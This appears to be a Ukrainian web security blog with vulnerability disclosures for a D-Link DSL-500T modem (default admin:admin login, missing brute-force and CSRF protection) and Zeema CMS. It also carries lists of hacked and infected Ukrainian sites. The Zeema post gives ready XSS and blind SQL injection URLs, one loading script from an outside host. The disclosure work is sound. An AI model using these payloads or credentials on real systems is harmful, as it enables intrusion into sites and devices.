Websecurity - Веб безпека

У квітні, 24.04.2011, я виявив численні уразливості в ADSL модемі D-Link DSL-500T ADSL Router. Це Predictable Resource Location, Brute Force та Cross-Site Request Forgery уразливості. Це перший advisory з серії записів про уразливості в продуктах D-Link.

При цьому даний модем я використовую в офісі ще з жовтня 2005, тому по суті про PRL та BF уразливості мені відомо ще з тих пір, а вже стосовно CSRF я перевірив в квітні цього року. Коли почав досліджувати питання безпеки ADSL модемів (і різних роутерів та інших мережевих пристроїв), зокрема ADSL модема Callisto 821+, про численні уразливості в якому я вже розповідав. Дані три уразливості аналогічні діркам в Iskra Callisto 821+.

Predictable Resource Location:

http://192.168.1.1

Адмінка модема розміщується по дефолтному шляху з дефолтним логіном і паролем (admin:admin). Що дозволяє локальним користувачам (що мають доступ до ПК, або по LAN), а також віддаленим користувачам через Інтернет (через CSRF, в тому числі з використанням нищезгаданої CSRF атаки) отримувати доступ до адмінки і змінювати налаштування модема.

Дефолтні вищезгадані налаштування - це звичайна практика у виробників ADSL роутерів, але той же D-Link в нових своїх пристроях почав змінювати цю ситуацію, про що я розповім стосовно іншого пристрою цієї компанії. Але при цьому провайдери повинні вносити зміни, хоча той же Укртелеком цього не робить в модемах Callisto (що він надає своїм клієнтам). При цьому Інтертелеком, що надав нам в аренду цей DSL-500T, як раз змінив дефолтний пароль в адмінці.

Brute Force:

В формі логіна http://192.168.1.1 немає захисту від Brute Force атак. Що дозволить підбирати пароль (якщо він змінений з дефолтного), зокрема при локальній атаці. Наприклад, по LAN зловмисні користувачі або вірус на одному з комп’ютерів може провести атаку для підбору паролю, якщо він був змінений.

CSRF:

Відсутність захисту від Brute Force (такого як капча) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін. Що стане в нагоді при проведенні атак на різні CSRF і XSS уразливості в панелі керування. Які цілком можуть бути в ній, що я можу сказати виходячи з уразливостей в іншому пристрої D-Link, який я купив в листопаді 2011, а також по діркам в Callisto 821+ (тому що дірки в адмінках модемів і роутерів дуже поширені).

В статті Атака через браузер. Анализ вредоносных Flash-объектов и документов в формате PDF розповідається про сучасні атаки через браузери (сайт журнала в даний момент не працює із-за технічних робіт, тому статтю слід шукати на інших сайтах в Мережі). Зокрема через плагіни до браузерів, такі як Adobe Acrobat та Adobe Flash.

В даній статті розглянуті наступні аспекти атак через плагіни до браузерів:

• Введення.
• Аналіз шкідливих файлів.
• Приклад 1. PDF + JavaScript.
• Приклад 2. SWF.
• Приклад 3. PDF + SWF.
• Висновки.

Використання уразливостей в популярних плагінах до браузерів, таких як Acrobat і Flash, в останні роки стало одним з найбільш популярних напрямків атак на користувачів Інтернету. Окрім шкідливих pdf і swf файлів, також використовуються комбіновані експлоіти, такі як флеш-контент у pdf-файлі.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://rada-bershad.gov.ua (хакером ho1onk) - 20.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
• http://koreiz-ps.gov.ua (хакером Wizardz) - 26.09.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
• http://webkolo.org.ua (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами
• http://webkolo.com.ua (хакерами з RKH) - 11.08.2011, зараз сайт вже виправлений адмінами
• http://azovdvorik.com (хакером iskorpitx) - 10.08.2011, зараз сайт вже виправлений адмінами

В даній добірці уразливості в веб додатках:

• SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay (деталі)
• Cross-Site Scripting vulnerability in Icinga (деталі)
• SAP NetWeaver JavaMailExamples - XSS (деталі)
• Cross-Site Scripting vulnerability in Nagios (деталі)
• Multiple SQL Injections in A Really Simple Chat (ARSC) (деталі)
• SAP NetWeaver ipcpricing - information disclose (деталі)
• XSS in A Really Simple Chat (ARSC) (деталі)
• Apache Archiva Multiple CSRF vulnerability (деталі)
• Apache Archiva Multiple XSS vulnerability (деталі)
• WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability (деталі)

Ще влітку 2007 року, 07.06.2007 та 08.07.2007, я знайшов Cross-Site Scripting уразливості на сайті http://meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на zakon.meta.ua.

XSS:

• alert(document.cookie) (для IE, а з використанням MouseOverJacking можна зробити версію для всіх браузерів)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у 2007 році (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

В серпні відбувся новий масовий взлом сайтів на сервері Besthosting. Він тривав на протязі 2010 - 2011 років: 14.12.2010, 27.12.2010, 22.01.2011, 04.02.2011-22.02.2011, 11.03.2011, 20.04.2011, 02.05.2011, 11.07.2011, 10.08.2011 та 11.09.2011-14.09.2011. Другий масовий взлом сайтів на сервері Besthosting відбувся раніше.

Був взломаний сервер української компанії Besthosting. Взлом, що складався з декількох масових дефейсів та багатьох окремих дефейсів по одному або декількох сайтах, відбувся в той же період, що і згаданий масовий взлом сайтів на сервері HostPro.

Всього було взломано 55 сайтів на сервері хостера Besthosting (IP 195.248.234.41). Це наступні сайти: www.dvs-vinnitsa.gov.ua, artbagets.com, ubozcn.gov.ua, picks.com.ua, rock.vn.ua, sharkdesign.com.ua, fest.od.ua, bastion.vn.ua, artstuff-pro.com.ua, wn4wz.org.ua, reactorband.com, startup-music.com, terroraiser.com, stalwart.ru, multimarket.in.ua, advokat-chernigov.com.ua, advokat-ismailov.com, www.derevodekor.ru, domikvkaluge.ru, saunapodkluch.com, www.megamart.dp.ua, sng-technologies.com, www.mediapositiv.com, andriyushenko.com, aspua.com, exybible.ru, web.cn.ua, viglstudio.com.ua, optdekor.com, olkaragro.com.ua, harakterstvo.in.ua, impreza.biz.ua, ithelper.com.ua, itmasters.kiev.ua, vipmaster.dn.ua, slepki.com.ua, sde.in.ua, shoptrenager.com.ua, studio-disco.com, bizgarant.com, katalogi.in.ua, kbr.in.ua, carbon.lg.ua, budservice.vn.ua, diana-secret.com, www.icees.ru, www.admin.vn.ua, www.zhu4ok.com, www.mir-ok.in.ua, www.momibosse.com.ua, 2g-studio.net, edemnaotdyh.com, lyubavushka.com, umishki.com.ua, nocturnus.com.ua. Серед них українські державні сайти ubozcn.gov.ua та www.dvs-vinnitsa.gov.ua.

З зазначених 55 сайтів 1 сайт був взломаний хакерами з S3cur1ty-T3r0r-Cr3w, 14 сайтів хакером Besiktas Carsi Grubu, 2 сайти хакером iskorpitx, 2 сайти хакерами з RKH, 2 сайти хакерами з KSG-CREW, 2 сайти хакером biangrusuh, 7 сайтів хакером Mr AnEnO, 21 сайт хакером Matrex, 3 сайти хакерами з ahs-hackerz та 1 сайт хакером kaMtiEz.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу невиликої групи сайтів та багатьох взломів маленьких груп сайтів на протязі двох років, маловірогідно, що вони були взломані через взлом серверу хостінг провайдера (коли через взлом одного сайта, був отриманий root доступ до сервера). Але атаку на інші сайти на даному сервері через взлом одного сайту не можна виключати (бо до деяких з цих сайтів могли дістатися і без root доступа).

Окрім сервісів для роботи з DNS серверами та сканування портів, про які я писав раніше, viewdns.info пропонує інші сервіси. Зокрема це Reverse IP Lookup - сервіс для зворотнього пошуку IP.

За допомогою онлайнового сервіса Reverse IP Lookup можна по доменному імені або по IP визначити які ще домени (сайти) розміщені на даному хості. Що може бути дуже корисно в деяких випадках (зокрема при аудиті чи пентесті).

Так само як і раніше згадані сервіси, даний онлайн інструмент від viewdns.info є безкоштовним.

В Інтернеті є чимало сайтів, що надають подібний сервіс. Але цей сервіс, як й інші, що мені траплялися, працює недостатньо ефективно і знаходить мало сайтів на хостах, зокрема на Shared Hosting серверах, на яких розміщено багато сайтів. Я сам вже багато років планую зробити власний сервіс для визначення всіх сайтів на хості (при цьому я планую зробити власний онлайн сервіс більш ефективним ніж аналогічні існуючі сервіси).

27.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Cross-Site Scripting, SQL Injection та Information Leakage уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Zeema CMS. Це друга частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

07.12.2011

Cross-Site Scripting:

http://site/counter/?act=ip&ip_addr=%3Cp%20style=-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)%3E

Атака спрацює в браузерах Mozilla і Firefox.

SQL Injection:

http://site/counter/?act=ip&ip_addr=%27%20and%20benchmark(10000000,md5(now()))%23

Це blind SQL Injection.

Information Leakage:

Статистика сайта http://site/counter/ знаходиться в публічному доступі (і шлях до неї легко дізнатися).

Уразливі всі версії Zeema CMS.

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки. Цього разу нова добірка статтей про безпеку онлайнових електронних транзакцій та використання платіжних карт в Інтернеті (на початку року я вже піднімав дану тему).

Добірка цікавого чтива на тему безпеки платіжних карт (статті з Вікіпедії):

• Payment Card Industry Data Security Standard (PCI DSS)
• Payment Application Data Security Standard (PA-DSS)
• Qualified Security Assessor (QSA)
• Payment system
• E-commerce payment system

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://archive.org.ua - інфекція була виявлена 27.11.2011. Зараз сайт не входить до переліку підозрілих.
• http://orienteering.dp.ua - інфекція була виявлена 06.12.2011. Зараз сайт не входить до переліку підозрілих.
• http://krizis2009.org.ua - інфекція була виявлена 22.11.2011. Зараз сайт входить до переліку підозрілих.
• http://drummer.in.ua - інфекція була виявлена 20.11.2011. Зараз сайт не входить до переліку підозрілих.
• http://medinstitut.kiev.ua - інфекція була виявлена 06.12.2011. Зараз сайт не входить до переліку підозрілих.